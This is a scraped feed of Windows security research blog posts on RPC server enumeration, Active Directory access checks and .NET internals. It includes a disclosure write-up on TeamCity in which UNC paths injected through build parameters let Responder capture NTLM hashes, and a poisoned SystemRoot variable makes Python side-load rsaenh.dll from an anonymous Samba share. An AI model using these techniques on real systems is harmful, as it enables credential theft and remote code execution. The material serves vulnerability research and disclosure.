Normal view

There are new articles available, click to refresh the page.
Before yesterdayWindows Exploitation

Finding Running RPC Server Information with NtObjectManager

By: tiraniddo
26 June 2022 at 21:56

When doing security research I regularly use my NtObjectManager PowerShell module to discover and call RPC servers on Windows. Typically I'll use the Get-RpcServer command, passing the name of a DLL or EXE file to extract the embedded RPC servers. I can then use the returned server objects to create a client to access the server and call its methods. A good blog post about how some of this works was written recently by blueclearjar.

Using Get-RpcServer only gives you a list of what RPC servers could possibly be running, not whether they are running and if so in what process. This is where the RpcView does better, as it parses a process' in-memory RPC structures to find what is registered and where. Unfortunately this is something that I'm yet to implement in NtObjectManager

However, it turns out there's various ways to get the running RPC server information which are provided by OS and the RPC runtime which we can use to get a more or less complete list of running servers. I've exposed all the ones I know about with some recent updates to the module. Let's go through the various ways you can piece together this information.

NOTE some of the examples of PowerShell code will need a recent build of the NtObjectManager module. For various reasons I've not been updating the version of the PS gallery, so get the source code from github and build it yourself.

RPC Endpoint Mapper

If you're lucky this is simplest way to find out if a particular RPC server is running. When an RPC server is started the service can register an RPC interface with the function RpcEpRegister specifying the interface UUID and version along with the binding information with the RPC endpoint mapper service running in RPCSS. This registers all current RPC endpoints the server is listening on keyed against the RPC interface. 

You can query the endpoint table using the RpcMgmtEpEltInqBegin and RpcMgmtEpEltInqNext APIs. I expose this through the Get-RpcEndpoint command. Running Get-RpcEndpoint with no parameters returns all interfaces the local endpoint mapper knows about as shown below.

PS> Get-RpcEndpoint
UUID                                 Version Protocol     Endpoint      Annotation
----                                 ------- --------     --------      ----------
51a227ae-825b-41f2-b4a9-1ac9557a1018 1.0     ncacn_ip_tcp 49669         
0497b57d-2e66-424f-a0c6-157cd5d41700 1.0     ncalrpc      LRPC-5f43...  AppInfo
201ef99a-7fa0-444c-9399-19ba84f12a1a 1.0     ncalrpc      LRPC-5f43...  AppInfo
...

Note that in addition to the interface UUID and version the output shows the binding information for the endpoint, such as the protocol sequence and endpoint. There is also a free form annotation field, but that can be set to anything the server likes when it calls RpcEpRegister.

The APIs also allow you to specify a remote server hosting the endpoint mapper. You can use this to query what RPC servers are running on a remote server, assuming the firewall doesn't block you. To do this you'd need to specify a binding string for the SearchBinding parameter as shown.

PS> Get-RpcEndpoint -SearchBinding 'ncacn_ip_tcp:primarydc'
UUID                                 Version Protocol     Endpoint     Annotation
----                                 ------- --------     --------     ----------
d95afe70-a6d5-4259-822e-2c84da1ddb0d 1.0     ncacn_ip_tcp 49664
5b821720-f63b-11d0-aad2-00c04fc324db 1.0     ncacn_ip_tcp 49688
650a7e26-eab8-5533-ce43-9c1dfce11511 1.0     ncacn_np     \PIPE\ROUTER Vpn APIs
...

The big issue with the RPC endpoint mapper is it only contains RPC interfaces which were explicitly registered against an endpoint. The server could contain many more interfaces which could be accessible, but as they weren't registered they won't be returned from the endpoint mapper. Registration will typically only be used if the server is using an ephemeral name for the endpoint, such as a random TCP port or auto-generated ALPC name.

Pros:

  • Simple command to run to get a good list of running RPC servers.
  • Can be run against remote servers to find out remotely accessible RPC servers.
Cons:
  • Only returns the RPC servers intentionally registered.
  • Doesn't directly give you the hosting process, although the optional annotation might give you a clue.
  • Doesn't give you any information about what the RPC server does, you'll need to find what executable it's hosted in and parse it using Get-RpcServer.

Service Executable

If the RPC servers you extract are in a registered system service executable then the module will try and work out what service that corresponds to by querying the SCM. The default output from the Get-RpcServer command will show this as the Service column shown below.

PS> Get-RpcServer C:\windows\system32\appinfo.dll
Name        UUID                                 Ver Procs EPs Service Running
----        ----                                 --- ----- --- ------- -------
appinfo.dll 0497b57d-2e66-424f-a0c6-157cd5d41700 1.0 7     1   Appinfo True
appinfo.dll 58e604e8-9adb-4d2e-a464-3b0683fb1480 1.0 1     1   Appinfo True
appinfo.dll fd7a0523-dc70-43dd-9b2e-9c5ed48225b1 1.0 1     1   Appinfo True
appinfo.dll 5f54ce7d-5b79-4175-8584-cb65313a0e98 1.0 1     1   Appinfo True
appinfo.dll 201ef99a-7fa0-444c-9399-19ba84f12a1a 1.0 7     1   Appinfo True

The output also shows the appinfo.dll executable is the implementation of the Appinfo service, which is the general name for the UAC service. Note here that is also shows whether the service is running, but that's just for convenience. You can use this information to find what process is likely to be hosting the RPC server by querying for the service PID if it's running. 

PS> Get-Win32Service -Name Appinfo
Name    Status  ProcessId
----    ------  ---------
Appinfo Running 6020

The output also shows that each of the interfaces have an endpoint which is registered against the interface UUID and version. This is extracted from the endpoint mapper which makes it again only for convenience. However, if you pick an executable which isn't a service implementation the results are less useful:

PS> Get-RpcServer C:\windows\system32\efslsaext.dll
Name          UUID                   Ver Procs EPs Service Running      
----          ----                   --- ----- --- ------- -------      
efslsaext.dll c681d488-d850-11d0-... 1.0 21    0           False

The efslsaext.dll implements one of the EFS implementations, which are all hosted in LSASS. However, it's not a registered service so the output doesn't show any service name. And it's also not registered with the endpoint mapper so doesn't show any endpoints, but it is running.

Pros:

  • If the executable's a service it gives you a good idea of who's hosting the RPC servers and if they're currently running.
  • You can get the RPC server interface information along with that information.
Cons:
  • If the executable isn't a service it doesn't directly help.
  • It doesn't ensure the RPC servers are running if they're not registered in the endpoint mapper. 
  • Even if the service is running it might not have enabled the RPC servers.

Enumerating Process Modules

Extracting the RPC servers from an arbitrary executable is fine offline, but what if you want to know what RPC servers are running right now? This is similar to RpcView's process list GUI, you can look at a process and find all all the services running within it.

It turns out there's a really obvious way of getting a list of the potential services running in a process, enumerate the loaded DLLs using an API such as EnumerateLoadedModules, and then run Get-RpcServer on each one to extract the potential services. To use the APIs you'd need to have at least read access to the target process, which means you'd really want to be an administrator, but that's no different to RpcView's limitations.

The big problem is just because a module is loaded it doesn't mean the RPC server is running. For example the WinHTTP DLL has a built-in RPC server which is only loaded when running the WinHTTP proxy service, but the DLL could be loaded in any process which uses the APIs.

To simplify things I expose this approach through the Get-RpcServer function with the ProcessId parameter. You can also use the ServiceName parameter to lookup a service PID if you're interested in a specific service.

PS> Get-RpcEndpoint -ServiceName Appinfo
Name        UUID                        Ver Procs EPs Service Running                ----        ----                        --- ----- --- ------- -------
RPCRT4.dll  afa8bd80-7d8a-11c9-bef4-... 1.0 5     0           False
combase.dll e1ac57d7-2eeb-4553-b980-... 0.0 0     0           False
combase.dll 00000143-0000-0000-c000-... 0.0 0     0           False

Pros:

  • You can determine all RPC servers which could be potentially running for an arbitrary process.
Cons:
  • It doesn't ensure the RPC servers are running if they're not registered in the endpoint mapper. 
  • You can't directly enumerate the module list, except for the main executable, from a protected process (there's are various tricks do so, but out of scope here).

Asking an RPC Endpoint Nicely

The final approach is just to ask an RPC endpoint nicely to tell you what RPC servers is supports. We don't need to go digging into the guts of a process to do this, all we need is the binding string for the endpoint we want to query and then call the RpcMgmtInqIfIds API.

This will only return the UUID and version of the RPC server that's accessible from the endpoint, not the RPC server information. But it will give you an exact list of all supported RPC servers, in fact it's so detailed it'll give you all the COM interfaces that the process is listening on as well. To query this list you only need to access to the endpoint transport, not the process itself.

How do you get the endpoints though? One approach is if you do have access to the process you can enumerate its server ALPC ports by getting a list of handles for the process, finding the ports with the \RPC Control\ prefix in their name and then using that to form the binding string. This approach is exposed through Get-RpcEndpoint's ProcessId parameter. Again it also supports a ServiceName parameter to simplify querying services.

PS> Get-RpcEndpoint -ServiceName AppInfo
UUID              Version Protocol Endpoint     
----              ------- -------- --------  
0497b57d-2e66-... 1.0     ncalrpc  \RPC Control\LRPC-0ee3...
201ef99a-7fa0-... 1.0     ncalrpc  \RPC Control\LRPC-0ee3...
...

If you don't have access to the process you can do it in reverse by enumerating potential endpoints and querying each one. For example you could enumerate the \RPC Control object directory and query each one. Since Windows 10 19H1 ALPC clients can now query the server's PID, so you can not only find out the exposed RPC servers but also what process they're running in. To query from the name of an ALPC port use the AlpcPort parameter with Get-RpcEndpoint.

PS> Get-RpcEndpoint -AlpcPort LRPC-0ee3261d56342eb7ac
UUID              Version Protocol Endpoint     
----              ------- -------- --------  
0497b57d-2e66-... 1.0     ncalrpc  \RPC Control\LRPC-0ee3...
201ef99a-7fa0-... 1.0     ncalrpc  \RPC Control\LRPC-0ee3...
...

Pros:

  • You can determine exactly what RPC servers are running in a process.
Cons:
  • You can't directly determine what the RPC server does as the list gives you no information about which module is hosting it.

Combining Approaches

Obviously no one approach is perfect. However, you can get most of the way towards RpcView process list by combining the module enumeration approach with asking the endpoint nicely. For example, you could first get a list of potential interfaces by enumerating the modules and parsing the RPC servers, then filter that list to only the ones which are running by querying the endpoint directly. This will also get you a list of the ALPC server ports that the RPC server is running on so you can directly connect to it with a manually built client. And example script for doing this is on github.

We are still missing some crucial information that RpcView can access such as the interface registration flags from any approach. Still, hopefully that gives you a few ways to approach analyzing the RPC attack surface of the local system and determining what endpoints you can call.

A case of DLL Side Loading from UNC via Windows environmental variable

5 July 2022 at 15:51

About a month ago I decided to take a look at JetBrains TeamCity, as I wanted to learn more about CVE-2022-25263 (an authenticated OS Command Injection in the Agent Push functionality).

Initially I just wanted to find the affected feature and test the mitigation put in place, eventually I ended up searching for other interesting behaviors that could be considered security issues- and came across something I believed was a vulnerability, however upon disclosure the vendor convinced me that the situation was considered normal in TeamCity's context and its thread model. Since the feature I was testing allowed me to set some of the environmental variables later passed to the given builder step process (in my case it was python.exe).

During that process I accidently discovered that Python on Windows can be used to side-load an arbitrary DLL named rsaenh.dll, placed in a directory named system32, located in a directory pointed by the SystemRoot environment variable passed to the process (it loads %SystemRoot%/system32/rsaenh.dll).

For the purpose of testing, I installed TeamCity on Windows 10 64-bit, with default settings, setting both the TeamCity Server and the TeamCity Build Agent to run as a regular user (which is the default setting).

I used the same system for both the TeamCity Server and the Build Agent.
First, as admin, I created a sample project with one build step of type Python.
I installed Python3 (python3.10 from the Microsoft App Store, checked the box to get it added to the PATH), so the agent would be compatible to run the build. I also created a hello world python build script:

From that point I switched to a regular user account, which was not allowed to define or edit build steps, but only to trigger them, with the ability to control custom build parameters (including some environmental variables).

I came across two separate instances of UNC path injection, allowing me to attack the Build Agent. In both cases I could make the system connect via SMB to the share of my choosing (allowing me to capture the NTLM hash, so I could try to crack it offline or SMB-relay it).

In case of build steps utilizing python, it also turned out possible to load an arbitrary DLL file from the share I set up with smbd hosted from the KALI box.


The local IP address of the Windows system was 192.168.99.4. I ran a KALI Linux box in the same network, under 192.168.99.5.

Injecting UNC to capture the hash / NTLM-relay

On the KALI box, I ran responder with default settings, like this:

Then, before running the build, I set the teamcity.build.checkoutDir parameter to \\192.168.99.5\pub:

I also ran Procmon and set up a filter to catch any events with the "Path" attribute containing "192.168.99.5".
I clicked "Run Build", which resulted in the UNC path being read by the service, as shown in the screenshot below:

Responder successfully caught the hash (multiple times):

I noticed that the teamcity.build.checkoutDir was validated and eventually it would not be used to attempt to load the build script (which was what I was trying to achieve in the first place by tampering with it), and the application fell back on the default value C:\TeamCity\buildAgent\work\2b35ac7e0452d98f when running the build. Still, before validation, the service interacted with the share, which I believe should not be the case.

Injecting UNC to load arbitrary DLL

I discovered I could attack the Build Agent by poisoning environmental variables the same way as I attacked the server, via build parameter customization.
Since my build step used python, I played with it a bit to see if I could influence the way it loads DLLs by changing environmental variables. It turned out I could.

Python on Windows can be used to side-load an arbitrary DLL named rsaenh.dll, placed in a directory named system32, located in a directory pointed by the SystemRoot environment variable passed to the process.

For example, by setting the SystemRoot environmental variable to "\\192.168.99.5\pub" (from the default "C:\WINDOWS" value):

In case of python3.10.exe, this resulted in the python executable trying to load \\192.168.99.5\pub\system32\rsaenh.dll:

With Responder running, just like in case of attacking the TeamCity Server, hashes were captured:

However, since python3.10 looked eager to load a DLL from a path that could be controlled with the SystemRoot variable, I decided to spin up an SMB share with public anonymous access and provide a copy of the original rsaenh.dll file into the pub\system32\ directory shared with SMB.
I used the following /etc/samba/smb.config:

[global]

workgroup = WORKGROUP
log file = /var/log/samba/log.%m
max log size = 1000
logging = file
panic action = /usr/share/samba/panic-action %d
server role = standalone server
map to guest = bad user
[pub]
comment = some useful files
read only = no
path = /home/pub
guest ok = yes
create mask = 0777
directory mask = 0777

I stopped Responder to free up the 445 port, I started smbd:

service smbd start

Then, I ran the build again, and had the python3.10 executable successfully load and execute the DLL from my share, demonstrating a vector of RCE on the Build Agent:

Not an issue from TeamCity perspective

About a week after reporting the issue to the vendor, I received a response, clarifying that any user having access to TeamCity is considered to have access to all build agent systems, therefore code execution on any build agent system, triggered from low-privileged user in TeamCity, does not violate any security boundaries. They also provided an example of an earlier, very similar submission, and the clarification that was given upon its closure https://youtrack.jetbrains.com/issue/TW-74408 (with a nice code injection vector via perl environmental variable).

python loading rsaenh.dll following the SystemRoot env variable

The fact that python used an environmental variable to load a DLL is an interesting occurrence on its own, as it could be used locally as an evasive technique alternative to rundll32.exe (https://attack.mitre.org/techniques/T1574/002/, https://attack.mitre.org/techniques/T1129/) - to inject malicious code into a process created from an original, signed python3.10.exe executable .

POC

The following code was used to build the DLL. It simply grabs the current username and current process command line, and appends them to a text file named poc.txt. Whenever DllMain is executed, for whatever reason, the poc.txt file will be appended with a line containing those details:

First, let's try to get it loaded without any signatures, locally:

Procmon output watching for any events with Path ending with "rsaenh.dll":

The poc.txt file was created in the current directory of  C:\Users\ewilded\HACKING\SHELLING\research\cmd.exe\python3_side_loading_via_SystemRoot while running python:

Similar cases

There must be more cases of popular software using environmental variables to locate some of the shared libraries they load.

To perform such a search dynamically, all executables in the scope directory could be iterated through and executed multiple times, each time testing arbitrary values set to individual common environmental variables like %SystemRoot% or %WINDIR%. This alone would be a good approach for starters, but it would definitely not provide an exhaustive coverage - most of the places in code those load attempts happen are not reachable without hitting proper command lines, specific to each executable.

A more exhaustive, and but also demanding approach, would be static analysis of all PE files in the scope that simply indicate the usage of both LoadLibrary and GetEnv functions (e..g LoadLibraryExW() and _wgetenv(), as python3.10.exe does) in their import tables.

Access Checking Active Directory

By: tiraniddo
17 July 2022 at 04:49

Like many Windows related technologies Active Directory uses a security descriptor and the access check process to determine what access a user has to parts of the directory. Each object in the directory contains an nTSecurityDescriptor attribute which stores the binary representation of the security descriptor. When a user accesses the object through LDAP the remote user's token is used with the security descriptor to determine if they have the rights to perform the operation they're requesting.

Weak security descriptors is a common misconfiguration that could result in the entire domain being compromised. Therefore it's important for an administrator to be able to find and remediate security weaknesses. Unfortunately Microsoft doesn't provide a means for an administrator to audit the security of AD, at least in any default tool I know of. There is third-party tooling, such as Bloodhound, which will perform this analysis offline but from reading the implementation of the checking they don't tend to use the real access check APIs and so likely miss some misconfigurations.

I wrote my own access checker for AD which is included in my NtObjectManager PowerShell module. I've used it to find a few vulnerabilities, such as CVE-2021-34470 which was an issue with Exchange's changes to AD. This works "online", as in you need to have an active account in the domain to run it, however AFAIK it should provide the most accurate results if what you're interested in what access an specific user has to AD objects. While the command is available in the module it's perhaps not immediately obvious how to use it an interpret the result, therefore I decide I should write a quick blog post about it.

A Complex Process

The access check process is mostly documented by Microsoft in [MS-ADTS]: Active Directory Technical Specification. Specifically in section 5.1.3. However, this leaves many questions unanswered. I'm not going to go through how it works in full either, but let me give a quick overview.  I'm going to assume you have a basic knowledge of the structure of the AD and its objects.

An AD object contains many resources that access might want to be granted or denied on for a particular user. For example you might want to allow the user to create only certain types of child objects, or only modify certain attributes. There are many ways that Microsoft could have implemented security, but they decided on extending the ACL format to introduce the object ACE. For example the ACCESS_ALLOWED_OBJECT_ACE structure adds two GUIDs to the normal ACCESS_ALLOWED_ACE

The first GUID, ObjectType indicates the type of object that the ACE applies to. For example this can be set to the schema ID of an attribute and the ACE will grant access to only that attribute nothing else. The second GUID, InheritedObjectType is only used during ACL inheritance. It represents the schema ID of the object's class that is allowed to inherit this ACE. For example if it's set to the schema ID of the computer class, then the ACE will only be inherited if such a class is created, it will not be if say a user object is created instead. We only need to care about the first of these GUIDs when doing an access check.

To perform an access check you need to use an API such as AccessCheckByType which supports checking the object ACEs. When calling the API you pass a list of object type GUIDs you want to check for access on. When processing the DACL if an ACE has an ObjectType GUID which isn't in the passed list it'll be ignored. Otherwise it'll be handled according to the normal access check rules. If the ACE isn't an object ACE then it'll also be processed.

If all you want to do is check if a local user has access to a specific object or attribute then it's pretty simple. Just get the access token for that user, add the object's GUID to the list and call the access check API. The resulting granted access can be one of the following specific access rights, not the names in parenthesis are the ones I use in the PowerShell module for simplicity:
  • ACTRL_DS_CREATE_CHILD (CreateChild) - Create a new child object
  • ACTRL_DS_DELETE_CHILD (DeleteChild) - Delete a child object
  • ACTRL_DS_LIST (List) - Enumerate child objects
  • ACTRL_DS_SELF (Self) - Grant a write-validated extended right
  • ACTRL_DS_READ_PROP (ReadProp) - Read an attribute
  • ACTRL_DS_WRITE_PROP (WriteProp) - Write an attribute
  • ACTRL_DS_DELETE_TREE (DeleteTree) - Delete a tree of objects
  • ACTRL_DS_LIST_OBJECT (ListObject) - List a tree of objects
  • ACTRL_DS_CONTROL_ACCESS (ControlAccess) - Grant a control extended right
You can also be granted standard rights such as READ_CONTROL, WRITE_DAC or DELETE which do what you'd expect them to do. However, if you want see what the maximum granted access on the DC would be it's slightly more difficult. We have the following problems:
  • The list of groups granted to a local user is unlikely to match what they're granted on the DC where the real access check takes place.
  • AccessCheckByType only returns a single granted access value, if we have a lot of object types to test it'd be quick expensive to call 100s if not 1000s of times for a single security descriptor.
While you could solve the first problem by having sufficient local privileges to manually create an access token and the second by using an API which returns a list of granted access such as AccessCheckByTypeResultList there's an "simpler" solution. You can use the Authz APIs, these allow you to manually build a security context with any groups you like without needing to create an access token and the AuthzAccessCheck API supports returning a list of granted access for each object in the type list. It just so happens that this API is the one used by the AD LDAP server itself.

Therefore to perform a "correct" maximum access check you need to do the following steps.
  1. Enumerate the user's group list for the DC from the AD. Local group assignments are stored in the directory's CN=Builtin container.
  2. Build an Authz security context with the group list.
  3. Read a directory object's security descriptor.
  4. Read the object's schema class and build a list of specific schema objects to check:
  • All attributes from the class and its super, auxiliary and dynamic auxiliary classes.
  • All allowable child object classes
  • All assignable control, write-validated and property set extended rights.
  • Convert the gathered schema information into the object type list for the access check.
  • Run the access check and handled the results.
  • Repeat from 3 for every object you want to check.
  • Trust me when I say this process is actually easier said than done. There's many nuances that just produce surprising results, I guess this is why most tooling just doesn't bother. Also my code includes a fair amount of knowledge gathered from reverse engineering the real implementation, but I'm sure I could have missed something.

    Using Get-AccessibleDsObject and Interpreting the Results

    Let's finally get to using the PowerShell command which is the real purpose of this blog post. For a simple check run the following command. This can take a while on the first run to gather information about the domain and the user.

    PS> Get-AccessibleDsObject -NamingContext Default
    Name   ObjectClass UserName       Modifiable Controllable
    ----   ----------- --------       ---------- ------------
    domain domainDNS   DOMAIN\alice   False      True

    This uses the NamingContext property to specify what object to check. The property allows you to easily specify the three main directories, Default, Configuration and Schema. You can also use the DistinguishedName property to specify an explicit DN. Also the Domain property is used to specify the domain for the LDAP server if you don't want to inspect the current user's domain. You can also specify the Recurse property to recursively enumerate objects, in this case we just access check the root object.

    The access check defaults to using the current user's groups, based on what they would be on the DC. This is obviously important, especially if the current user is a local administrator as they wouldn't be guaranteed to have administrator rights on the DC. You can specify different users to check either by SID using the UserSid property, or names using the UserName property. These properties can take multiple values which will run multiple checks against the list of enumerated objects. For example to check using the domain administrator you could do the following:

    PS> Get-AccessibleDsObject -NamingContext Default -UserName DOMAIN\Administrator
    Name   ObjectClass UserName             Modifiable Controllable
    ----   ----------- --------             ---------- ------------
    domain domainDNS   DOMAIN\Administrator True       True

    The basic table format for the access check results shows give columns, the common name of the object, it's schema class, the user that was checked and whether the access check resulted in any modifiable or controllable access being granted. Modifiable is things like being able to write attributes or create/delete child objects. Controllable indicates one or more controllable extended right was granted to the user, such as allowing the user's password to be changed.

    As this is PowerShell the access check result is an object with many properties. The following properties are probably the ones of most interest when determining what access is granted to the user.
    • GrantedAccess - The granted access when only specifying the object's schema class during the check. If an access is granted at this level it'd apply to all values of that type, for example if WriteProp is granted then any attribute in the object can be written by the user.
    • WritableAttributes - The list of attributes a user can modify.
    • WritablePropertySets - The list of writable property sets a user can modify. Note that this is more for information purposes, the modifiable attributes will also be in the WritableAttributes property which is going to be easier to inspect.
    • GrantedControl - The list of control extended rights granted to a user.
    • GrantedWriteValidated - The list of write validated extended rights granted to a user.
    • CreateableClasses - The list of child object classes that can be created.
    • DeletableClasses - The list of child object classes that can be deleted.
    • DistinguishedName - The full DN of the object.
    • SecurityDescriptor - The security descriptor used for the check.
    • TokenInfo - The user's information used in the check, such as the list of groups.
    The command should be pretty easy to use. That said it does come with a few caveats. First you can only use the command with direct access to the AD using a domain account. Technically there's no reason you couldn't implement a gatherer like Bloodhound and doing the access check offline, but I just don't. I've not tested it in weirder setups such as complex domain hierarchies or RODCs.

    If you're using a low-privileged user there's likely to be AD objects that you can't enumerate or read the security descriptor from. This means the results are going to depend on the user you use to enumerate with. The best results would be using a domain/enterprise administrator will full access to everything.

    Based on my testing when I've found an access being granted to a user that seems to be real, however it's possible I'm not always 100% correct or that I'm missing accesses. Also it's worth noting that just having access doesn't mean there's not some extra checking done by the LDAP server. For example there's an explicit block on creating Group Managed Service Accounts in Computer objects, even though that will seem to be a granted child object.

    Simple CIL Opcode Execution in PowerShell using the DynamicMethod Class and Delegates

    2 October 2013 at 00:09
    tl:dr version

    It is possible to assemble .NET methods with CIL opcodes (i.e. .NET bytecode) in PowerShell in only a few lines of code using dynamic methods and delegates.



    I’ll admit, I have a love/hate relationship with PowerShell. I love that it is the most powerful scripting language and shell but at the same time, I often find quirks in the language that consistently bother me. One such quirk is the fact that integers don’t wrap when they overflow. Rather, they saturate – they are cast into the next largest type that can accommodate them. To demonstrate what I mean, observe the following:


    You’ll notice that [Int16]::MaxValue (i.e. 0x7FFF) understandably remains an Int16. However, rather than wrapping when adding one, it is upcast to an Int32. Admittedly, this is probably the behavior that most PowerShell users would desire. I, on the other hand wish I had the option to perform math on integers that wrapped. To solve this, I originally thought that I would have to write an addition function using complicated binary logic. I opted not to go that route and decided to assemble a function using raw CIL (common intermediate language) opcodes. What follows is a brief explanation of how to accomplish this task.


    Common Intermediate Language Basics

    CIL is the bytecode that describes .NET methods. A description of all the opcodes implemented by Microsoft can be found here. Every time you call a method in .NET, the runtime either interprets its opcodes or it executes the assembly language equivalent of those opcodes (as a result of the JIT process - just-in-time compilation). The calling convention for CIL is loosely related to how calls are made in X86 assembly – arguments are pushed onto a stack, a method is called, and a return value is returned to the caller.

    Since we’re on the subject of addition, here are the CIL opcodes that would add two numbers of similar type together and would wrap in the case of an overflow:

    IL_0000: Ldarg_0 // Loads the argument at index 0 onto the evaluation stack.
    IL_0001: Ldarg_1 // Loads the argument at index 1 onto the evaluation stack.
    IL_0002: Add // Adds two values and pushes the result onto the evaluation stack.
    IL_0003: Ret // Returns from the current method, pushing a return value (if present) from the callee's evaluation stack onto the caller's evaluation stack.

    Per Microsoft documentation, “integer addition wraps, rather than saturates” when using the Add instruction. This is the behavior I was after in the first place. Now let’s learn how to build a method in PowerShell that uses these opcodes.


    Dynamic Methods

    In the System.Reflection.Emit namespace, there is a DynamicMethod class that allows you to create methods without having to first go through the steps of creating an assembly and module. This is nice when you want a quick and dirty way to assemble and execute CIL opcodes. When creating a DynamicMethod object, you will need to provide the following arguments to its constructor:

    1) The name of the method you want to create
    2) The return type of the method
    3) An array of types that will serve as the parameters

    The following PowerShell command will satisfy those requirements for an addition function:

    $MethodInfo = New-Object Reflection.Emit.DynamicMethod('UInt32Add', [UInt32], @([UInt32], [UInt32]))

    Here, I am creating an empty method that will take two UInt32 variables as arguments and return a UInt32.

    Next, I will actually implement the logic of the method my emitting the CIL opcodes into the method:

    $ILGen = $MethodInfo.GetILGenerator()
    $ILGen.Emit([Reflection.Emit.OpCodes]::Ldarg_0)
    $ILGen.Emit([Reflection.Emit.OpCodes]::Ldarg_1)
    $ILGen.Emit([Reflection.Emit.OpCodes]::Add)
    $ILGen.Emit([Reflection.Emit.OpCodes]::Ret)

    Now that the logic of the method is complete, I need to create a delegate from the $MethodInfo object. Before this can happen, I need to create a delegate in PowerShell that matches the method signature for the UInt32Add method. This can be accomplished by creating a generic Func delegate with the following convoluted syntax:

    $Delegate = [Func``3[UInt32, UInt32, UInt32]]

    The previous command states that I want to create a delegate for a function that accepts two UInt32 arguments and returns a UInt32. Note that the Func delegate wasn't introduced until .NET 3.5 which means that this technique will only work in PowerShell 3+. With that, we can now bind the method to the delegate:

    $UInt32Add = $MethodInfo.CreateDelegate($Delegate)

    And now, all we have to do is call the Invoke method to perform normal integer math that wraps upon an overflow:

    $UInt32Add.Invoke([UInt32]::MaxValue, 2)

    Here is the code in its entirety:


    For additional information regarding the techniques I described, I encourage you to read the following articles:

    Introduction to IL Assembly Language
    Reflection Emit Dynamic Method Scenarios
    How to: Define and Execute Dynamic Methods

    Reverse Engineering InternalCall Methods in .NET

    16 November 2013 at 19:52
    Often times, when attempting to reverse engineer a particular .NET method, I will hit a wall because I’ll dig in far enough into the method’s implementation that I’ll reach a private method marked [MethodImpl(MethodImplOptions.InternalCall)]. For example, I was interested in seeing how the .NET framework loads PE files in memory via a byte array using the System.Reflection.Assembly.Load(Byte[]) method. When viewed in ILSpy (my favorite .NET decompiler), it will show the following implementation:
     
     
    So the first thing it does is check to see if you’re allowed to load a PE image in the first place via the CheckLoadByteArraySupported method. Basically, if the executing assembly is a tile app, then you will not be allowed to load a PE file as a byte array. It then calls the RuntimeAssembly.nLoadImage method. If you click on this method in ILSpy, you will be disappointed to find that there does not appear to be a managed implementation.
     
     
    As you can see, all you get is a method signature and an InternalCall property. To begin to understand how we might be able reverse engineer this method, we need to know the definition of InternalCall. According to MSDN documentation, InternalCall refers to a method call that “is internal, that is, it calls a method that is implemented within the common language runtime.” So it would seem likely that this method is implemented as a native function in clr.dll. To validate my assumption, let’s use Windbg with sos.dll – the managed code debugger extension. My goal using Windbg will be to determine the native pointer for the nLoadImage method and see if it jumps to its respective native function in clr.dll. I will attach Windbg to PowerShell since PowerShell will make it easy to get the information needed by the SOS debugger extension. The first thing I need to do is get the metadata token for the nLoadImage method. This will be used in Windbg to resolve the method.
     
     
    As you can see, the Get-ILDisassembly function in PowerSploit conveniently provides the metadata token for the nLoadImage method. Now on to Windbg for further analysis…
     
     
    The following commands were executed:
     
    1) .loadby sos clr
     
    Load the SOS debugging extension from the directory that clr.dll is loaded from
     
    2) !Token2EE mscorlib.dll 0x0600278C
     
    Retrieves the MethodDesc of the nLoadImage method. The first argument (mscorlib.dll) is the module that implements the nLoadImage method and the hex number is the metadata token retrieved from PowerShell.
     
    3) !DumpMD 0x634381b0
     
    I then dump information about the MethodDesc. This will give the address of the method table for the object that implements nLoadImage
     
    4) !DumpMT -MD 0x636e42fc
     
    This will dump all of the methods for the System.Reflection.RuntimeAssembly class with their respective native entry point. nLoadImage has the following entry:
     
    635910a0 634381b0   NONE System.Reflection.RuntimeAssembly.nLoadImage(Byte[], Byte[], System.Security.Policy.Evidence, System.Threading.StackCrawlMark ByRef, Boolean, System.Security.SecurityContextSource)
     
    So the native address for nLoadImage is 0x635910a0. Now, set a breakpoint on that address, let the program continue execution and use PowerShell to call the Load method on a bogus PE byte array.
     
    PS C:\> [Reflection.Assembly]::Load(([Byte[]]@(1,2,3)))
     
    You’ll then hit your breakpoint in WIndbg and if you disassemble from where you landed, the function that implements the nLoadImage method will be crystal clear – clr!AssemblyNative::LoadImage
     
     
    You can now use IDA for further analysis and begin digging into the actual implementation of this InternalCall method!
     
     
    After digging into some of the InternalCall methods in IDA you’ll quickly see that most functions use the fastcall convention. In x86, this means that a static function will pass its first two arguments via ECX and EDX. If it’s an instance function, the ‘this’ pointer will be passed via ECX (as is standard in thiscall) and its first argument via EDX. Any remaining arguments are pushed onto the stack.
     
    So for the handful of people that have wondered where the implementation for an InternalCall method lies, I hope this post has been helpful.

    IRQLs Close Encounters of the Rootkit Kind

    3 January 2022 at 00:00
    IRQL Overview Present since the early stages of Windows NT, an Interrupt Request Level (IRQL) defines the current hardware priority at which a CPU runs at any given time. On a multi-processor architecture, each CPU can hold a different and independent IRQL value, which is stored inside the CR8register. We should keep this in mind as we are going to build our lab examples on a quad-core system. Every hardware interrupt is mapped to a specific request level as depicted below.

    Bypassing Intel CET with Counterfeit Objects

    22 September 2022 at 00:00
    Since its inception in 20051, return-oriented programming (ROP) has been the predominant avenue to thwart W^X2 mitigation during memory corruption exploitation. While Data Execution Prevention (DEP) has been engineered to block plain code injection attacks from specific memory areas, attackers have quickly adapted and instead of injecting an entire code payload, they resorted in reusing multiple code chunks from DEP-allowed memory pages, called ROP gadgets. These code chunks are taken from already existing code in the target application and chained together to resemble the desired attacker payload or to just disable DEP on a per page basis to allow the existing code payloads to run.

    PAWNYABLE UAF Walkthrough (Holstein v3)

    By: h0mbre
    29 October 2022 at 04:00

    Introduction

    I’ve been wanting to learn Linux Kernel exploitation for some time and a couple months ago @ptrYudai from @zer0pts tweeted that they released the beta version of their website PAWNYABLE!, which is a “resource for middle to advanced learners to study Binary Exploitation”. The first section on the website with material already ready is “Linux Kernel”, so this was a perfect place to start learning.

    The author does a great job explaining everything you need to know to get started, things like: setting up a debugging environment, CTF-specific tips, modern kernel exploitation mitigations, using QEMU, manipulating images, per-CPU slab caches, etc, so this blogpost will focus exclusively on my experience with the challenge and the way I decided to solve it. I’m going to try and limit redundant information within this blogpost so if you have any questions, it’s best to consult PAWNYABLE and the other linked resources.

    What I Started With

